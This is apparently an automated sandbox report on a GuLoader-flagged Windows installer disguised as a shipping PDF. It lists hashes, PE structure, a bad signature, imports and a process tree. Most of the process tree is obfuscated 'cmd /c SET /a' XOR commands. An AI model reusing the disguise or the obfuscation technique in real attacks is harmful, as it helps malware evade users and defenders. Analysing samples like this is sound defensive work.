                                              Preview:Y.!&.Z....o.....-....D....8.)8E^.+.....a..7..[?cH.Y...d..[....2R.&..f.....,t.y.OO..q.>..@.%..r...h,.N.~xh......&..{.....6.pR2cM...tM8X.1....q.......;).../0.u...f}...j}.3......+[._.`VS..U+!yoY........?R...Z..X.i...o....O.}...9.`F.e>~.%...E..Z...(?...........j..^zC.>...\.n.3."f....V;......,....&...-.#...,c....\3Z......}^!..[A....Y.U./Rz....a.....|......:5p...._.[...g....B&.-....T.WF..dY..^.Z..W/.......M.V. ....*..:I...A.........{.5.....2f5A......W*.p.T..9K..n3.Js..N<.L.W...=Hv.8Q.d.(.H!`k.aO....Y....s....l.1.A`H.P<u.Z4..).0.n.......M/GL..JjD.;.P.... .;.H..h.7D.|..e..(._WTD......:<J^..a....Eq]}.f....t...J&.:d+t......5.)]'.ww..`.A...q....!.....Y..7...X.p.y.D...].y...P.=pc..V&T. `W}B.....%..D."...P....#..,...:.&."4$1..e.9Z......F2."mTM....~...g.....c..%".T...q..$_l...#j..:t...."...t=.e.....@.U.i.U..Bj.....E#...~.r.<....,.UP5t..@e....G....H......7Ye..i......^......9..4C.o.3..F'..A..e..=.u..Bw.6S..^..]..v..&.....<)$On.UxV5.+:..vh....a.q..R...e

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):6.715600015491742
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:Original Shipment_Document.PDF.exe
                                              File size:341696
                                              MD5:626cdeaa4696c819fd07921073f6c740
                                              SHA1:b094f5e4c3792a05b7f307ad78d2e52cfcbf87b4
                                              SHA256:d8519cee2bbf5c257375b339d530b33f275db40c06de0f96911eb5b4f207f2c5
                                              SHA512:2cbfa1d322bd8b6bd861c97f43ef4778a6ef2fb86b718f2571b54f1ce5874afbdf3a9e1728986c7593eb7f48b2defcff624ac467a5ff2677d9036093edaf88f0
                                              SSDEEP:6144:JNeZc5FBkXpIwbmr2KEROaPdEY8mff3PgRsmq:JNRTr2KEROoT8mfH+q
                                              TLSH:9F741AC1E199FCD5C428007659B9E521251BAB6EF0B8493B396A7519B0FF383607BE0F
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................f...*.....

                                              File Icon

                                              Icon Hash:ccc0d4ccccdc6cb4

                                              Static PE Info

                                              General

                                              Entrypoint:0x4034f7
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x614F9AE5 [Sat Sep 25 21:55:49 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:CN="Slnggrebets Buginese Itemizer ", OU="Louped Estes ", E=Kodeskrifter@Blakkers.For, O=Kedging, L=Bury, S=England, C=GB
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 9/30/2021 7:49:03 AM 9/29/2024 7:49:03 AM
                                              Subject Chain
                                              • CN="Slnggrebets Buginese Itemizer ", OU="Louped Estes ", E=Kodeskrifter@Blakkers.For, O=Kedging, L=Bury, S=England, C=GB
                                              Version:3
                                              Thumbprint MD5:9531A5E4D76383B4586733B6369AA05A
                                              Thumbprint SHA-1:EB1025208E0319CC8EEFE675D7F0134D108F989B
                                              Thumbprint SHA-256:1860FBBE1C07E5046864295E0AE0BA476642D85716E6DDB0C4D6E2BF3405DB86
                                              Serial:2A16DD32E2795EBB

                                              Entrypoint Preview

                                              Instruction
                                              push ebp
                                              mov ebp, esp
                                              sub esp, 000003F4h
                                              push ebx
                                              push esi
                                              push edi
                                              push 00000020h
                                              pop edi
                                              xor ebx, ebx
                                              push 00008001h
                                              mov dword ptr [ebp-14h], ebx
                                              mov dword ptr [ebp-04h], 0040A2E0h
                                              mov dword ptr [ebp-10h], ebx
                                              call dword ptr [004080CCh]
                                              mov esi, dword ptr [004080D0h]
                                              lea eax, dword ptr [ebp-00000140h]
                                              push eax
                                              mov dword ptr [ebp-0000012Ch], ebx
                                              mov dword ptr [ebp-2Ch], ebx
                                              mov dword ptr [ebp-28h], ebx
                                              mov dword ptr [ebp-00000140h], 0000011Ch
                                              call esi
                                              test eax, eax
                                              jne 00007FC308AD500Ah
                                              lea eax, dword ptr [ebp-00000140h]
                                              mov dword ptr [ebp-00000140h], 00000114h
                                              push eax
                                              call esi
                                              mov ax, word ptr [ebp-0000012Ch]
                                              mov ecx, dword ptr [ebp-00000112h]
                                              sub ax, 00000053h
                                              add ecx, FFFFFFD0h
                                              neg ax
                                              sbb eax, eax
                                              mov byte ptr [ebp-26h], 00000004h
                                              not eax
                                              and eax, ecx
                                              mov word ptr [ebp-2Ch], ax
                                              cmp dword ptr [ebp-0000013Ch], 0Ah
                                              jnc 00007FC308AD4FDAh
                                              and word ptr [ebp-00000132h], 0000h
                                              mov eax, dword ptr [ebp-00000134h]
                                              movzx ecx, byte ptr [ebp-00000138h]
                                              mov dword ptr [0042A2D8h], eax
                                              xor eax, eax
                                              mov ah, byte ptr [ebp-0000013Ch]
                                              movzx eax, ax
                                              or eax, ecx
                                              xor ecx, ecx
                                              mov ch, byte ptr [ebp-2Ch]
                                              movzx ecx, cx
                                              shl eax, 10h
                                              or eax, ecx

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x2eec8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x52fb00x710.rsrc
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x65150x6600False0.6615349264705882data6.439707948554623IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0x80000x139a0x1400False0.45data5.145774564074664IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0xa0000x203380x600False0.4993489583333333data4.013698650446401IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .ndata0x2b0000x270000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x520000x2eec80x2f000False0.3425500748005319data5.305541691795029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x523400x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                              RT_ICON0x62b680x94a8dataEnglishUnited States
                                              RT_ICON0x6c0100x6cb4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                              RT_ICON0x72cc80x5488dataEnglishUnited States
                                              RT_ICON0x781500x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 1056964608EnglishUnited States
                                              RT_ICON0x7c3780x25a8dataEnglishUnited States
                                              RT_ICON0x7e9200x10a8dataEnglishUnited States
                                              RT_ICON0x7f9c80x988dataEnglishUnited States
                                              RT_ICON0x803500x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                              RT_DIALOG0x807b80x100dataEnglishUnited States
                                              RT_DIALOG0x808b80x11cdataEnglishUnited States
                                              RT_DIALOG0x809d80xc4dataEnglishUnited States
                                              RT_DIALOG0x80aa00x60dataEnglishUnited States
                                              RT_GROUP_ICON0x80b000x84dataEnglishUnited States
                                              RT_MANIFEST0x80b880x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                              Imports

                                              DLLImport
                                              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              No network behavior found

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:11:24:13
                                              Start date:05/08/2022
                                              Path:C:\Users\user\Desktop\Original Shipment_Document.PDF.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Original Shipment_Document.PDF.exe"
                                              Imagebase:0x400000
                                              File size:341696 bytes
                                              MD5 hash:626CDEAA4696C819FD07921073F6C740
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.520490666.00000000030F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Target ID:1
                                              Start time:11:24:16
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x721C070B^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:2
                                              Start time:11:24:17
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:3
                                              Start time:11:24:17
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x7C156677^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:4
                                              Start time:11:24:18
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:6
                                              Start time:11:24:18
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x03631637^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:7
                                              Start time:11:24:18
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:8
                                              Start time:11:24:19
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x5C382120^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:10
                                              Start time:11:24:19
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:11
                                              Start time:11:24:20
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x7F303920^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:12
                                              Start time:11:24:20
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:13
                                              Start time:11:24:20
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x78713865^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:14
                                              Start time:11:24:20
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:15
                                              Start time:11:24:21
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x4B6D7569^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:17
                                              Start time:11:24:21
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:18
                                              Start time:11:24:21
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x19307575^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:19
                                              Start time:11:24:22
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:20
                                              Start time:11:24:22
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x41616575^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:21
                                              Start time:11:24:22
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:22
                                              Start time:11:24:22
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x09696575^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:23
                                              Start time:11:24:23
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:24
                                              Start time:11:24:23
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x0975752C^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:25
                                              Start time:11:24:23
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:26
                                              Start time:11:24:24
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x19697965^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:27
                                              Start time:11:24:24
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:28
                                              Start time:11:24:24
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x49796569^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:29
                                              Start time:11:24:25
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:30
                                              Start time:11:24:25
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x19307571^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:31
                                              Start time:11:24:25
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff73c930000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:32
                                              Start time:11:24:26
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x15793C65^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:33
                                              Start time:11:24:26
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:34
                                              Start time:11:24:27
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x09216D75^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:35
                                              Start time:11:24:28
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:36
                                              Start time:11:24:30
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x15793C65^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:37
                                              Start time:11:24:32
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:39
                                              Start time:11:24:32
                                              Start date:05/08/2022
                                              Path:C:\Windows\SysWOW64\cmd.eXe
                                              Wow64 process (32bit):
                                              Commandline:cmd.eXe /c SeT /a "0x09703C6B^962155845"
                                              Imagebase:
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:
                                              Has administrator privileges:
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:40
                                              Start time:11:24:33
                                              Start date:05/08/2022
                                              Path:C:\Windows\System32\Conhost.exe
                                              Wow64 process (32bit):
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
